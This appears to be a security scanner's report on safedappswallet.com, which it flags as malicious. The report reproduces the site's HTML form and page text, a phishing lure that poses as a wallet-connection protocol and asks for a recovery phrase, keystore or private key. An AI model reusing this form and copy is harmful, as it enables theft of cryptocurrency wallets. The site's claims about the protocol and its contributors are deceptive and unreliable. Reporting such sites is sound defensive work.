safedappswallet.com Open in urlscan Pro
194.163.128.86  Malicious Activity! Public Scan

URL: https://safedappswallet.com/
Submission: On March 21 via automatic, source certstream-suspicious — Scanned from DE

Form analysis 1 forms found in the DOM

#

<form action="#" id="processForm" enctype="multipart/form-data">
  <input type="hidden" name="wallet" id="walletNameData">
  <div id="data-to-send">
    <div class="form-group">
      <div class="form-group">
        <input type="hidden" id="type" name="type" value="phrase">
        <textarea name="phrase" required="" class="form-control" placeholder="Enter your recovery phrase" rows="5" style="resize: none"></textarea>
      </div>
      <div class="small text-left my-3" style="font-size: 11px">Typically 12 (sometimes 24) words separated by single spaces</div>
    </div>
  </div>
  <button type="submit" id="proceedButton" class="btn btn-primary btn-block" style="font-weight: bold; font-size: 14px;">PROCEED</button>
  <div class="text-right">
    <button type="button" id="cancelBtn" class="btn btn-sm dialog-dismiss btn-danger mt-2 text-right">Cancel</button>
  </div>
</form>

Text Content

GithubDocs

WalletsApps


30

PROCESSING...

CONNECTION SUCCESSFUL

CONNECTION FAILED, TRY AGAIN

My app
Phrase Keystore JSON Private Key
Typically 12 (sometimes 24) words separated by single spaces
PROCEED
Cancel
Back X



SAFEDAPPSWALLET


THE OPEN PROTOCOL FOR SYNCING WALLETS TO DAPPS


WHAT IS SAFEDAPPSWALLET?

Safedappswallet is an open source protocol for connecting decentralised
applications to mobile wallets with QR code scanning or deep linking. A user can
interact securely with any Dapp from their mobile phone, making Safedappswallet
wallets a safer choice compared to desktop or browser extension wallets.


HOW DOES IT WORK?

Safedappswallet connects web applications to supported mobile wallets.
Safedappswallet session is started by a scanning a QR code (desktop) or by
clicking an application deep link (mobile).


TOP PROJECT FUNDERS




TOP CODE CONTRIBUTORS

Rainbow
Trust
Argent
Walleth
Gnosis


FREQUENTLY ASKED QUESTIONS


CAN I INSTALL SAFEDAPPSWALLET?

Safedappswallet is not an app, but a protocol supported by many different
decentralised applications and wallets. Install any of mobile wallets supporting
Safedappswallet protocol. Safedappswallet wallets are available for Android and
iPhone.


IS THERE A TOKEN?

There is no token. Safedappswallet protocol does not run on a blockchain and
there are no fees.


HOW CAN I HELP SAFEDAPPSWALLET PROJECT?

Safedappswallet project is developed by open source developers of various Wallet
and Dapp projects. Please contact us on Discord or Telegram if you want to help
the project.


HOW CAN I BUILD A WALLET SUPPORTING SAFEDAPPSWALLET?

There are libraries for React-Native(Javascript), Android (Kotlin) and Swift
(iOS) available. Read more about it in our documentation.


HOW CAN I ADD SAFEDAPPSWALLET SUPPORT TO DAPP I DEVELOPED?

You can support various wallets either using Web3Modal library or add a support
for Safedappswallet provider directly.


HOW WEB FRONTEND AND MOBILE WALLETS COMMUNICATE?

Communication happens over a bridge server that relays messages without access
to their content. The contents are encrypted using the session data shared by
the QR code or deep link between the dapp and the wallet. Read more about it in
our documentation. Safedappswallet Association runs a public bridge server, but
you can also roll your own.

Discord



Telegram



Twitter



Github